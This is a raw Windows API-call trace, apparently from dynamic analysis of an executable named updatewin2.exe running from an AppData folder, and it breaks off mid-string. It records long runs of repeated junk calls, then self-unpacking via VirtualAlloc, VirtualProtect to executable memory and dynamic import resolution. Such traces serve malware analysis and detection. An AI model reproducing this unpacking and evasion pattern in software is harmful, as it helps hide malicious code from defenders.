GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.042] AddAtomA (lpString=0x0) returned 0x0 [0119.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.043] AddAtomA (lpString=0x0) returned 0x0 [0119.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.043] AddAtomA (lpString=0x0) returned 0x0 [0119.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.043] AddAtomA (lpString=0x0) returned 0x0 [0119.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.043] AddAtomA (lpString=0x0) returned 0x0 [0119.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.154] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0119.154] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0119.155] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0119.155] SetErrorMode (uMode=0x400) returned 0x0 [0119.155] SetErrorMode (uMode=0x0) returned 0x400 [0119.155] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0119.155] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0119.158] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0119.243] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.244] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0119.245] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0119.246] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0119.247] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0119.248] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0119.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0119.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0119.250] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0119.250] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0119.250] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0119.250] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0119.250] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0119.250] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0119.250] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0119.250] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75420000 [0119.254] GetProcAddress (hModule=0x75420000, lpProcName="atexit") returned 0x7543c544 [0119.254] atexit (param_1=0x5f63d8) returned 0 [0119.255] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0xdf06ac80, dwHighDateTime=0x1d6d58a)) [0119.255] GetCurrentThreadId () returned 0x1c4 [0119.255] GetCurrentProcessId () returned 0x670 [0119.255] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=23943737552) returned 1 [0119.265] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0119.266] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.266] GetLastError () returned 0x57 [0119.267] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.267] GetLastError () returned 0x57 [0119.267] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0119.267] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0119.267] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.267] GetLastError () returned 0x57 [0119.267] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0119.267] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0119.352] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.352] GetLastError () returned 0x57 [0119.352] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.352] GetLastError () returned 0x57 [0119.352] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0119.352] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0119.353] GetProcessHeap () returned 0x5e0000 [0119.353] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.353] GetLastError () returned 0x57 [0119.353] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0119.353] GetLastError () returned 0x57 [0119.353] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0119.353] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x364) returned 0x60ad00 [0119.354] SetLastError (dwErrCode=0x57) [0119.354] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xc00) returned 0x60b070 [0119.355] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0x4da1a067, hStdError=0xfffffffe)) [0119.355] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0119.355] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0119.355] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.356] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe\" " [0119.356] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe\" " [0119.356] IsValidCodePage (CodePage=0x4e4) returned 1 [0119.356] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0119.356] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0119.356] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.356] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0119.356] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0119.357] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.357] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0119.357] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.357] GetLastError () returned 0x57 [0119.357] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0119.357] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.375] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0119.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¿\x0eøM`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0119.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0119.375] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.375] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 